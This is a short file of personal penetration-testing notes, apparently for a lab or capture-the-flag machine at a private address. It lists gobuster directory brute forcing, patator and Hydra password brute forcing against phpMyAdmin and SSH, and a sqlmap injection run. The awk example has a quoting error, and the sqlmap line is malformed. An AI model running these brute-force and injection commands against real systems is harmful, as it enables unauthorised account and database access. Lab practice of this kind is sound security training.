# output first and fourth items
echo "hello::there::my::friend" | awk -F ":: '{print $1, $4}'

# brute force directories
gobuster dir -u http://192.168.1.142 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt

# phpmyadmin brute
 patator http_fuzz url=http://192.168.1.142/phpmyadmin/index.php method=POST follow=1 accept_cookie=1  body='pma_username=FILE0&pma_password=kzMb5nVYJw&server=1&lang=en' 0=common-user
names.txt -x ignore:fgrep='Cannot log in to the MySQL server'

# Hydra brute ssh
hydra -l ramses -P /home/kali/10k-most-common.txt 192.168.1.142 -s 777 -t 4 ssh

# use sqlmap to describe database
sqlmap -u  http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=DESCRIBE phpmyadmin; --dbs

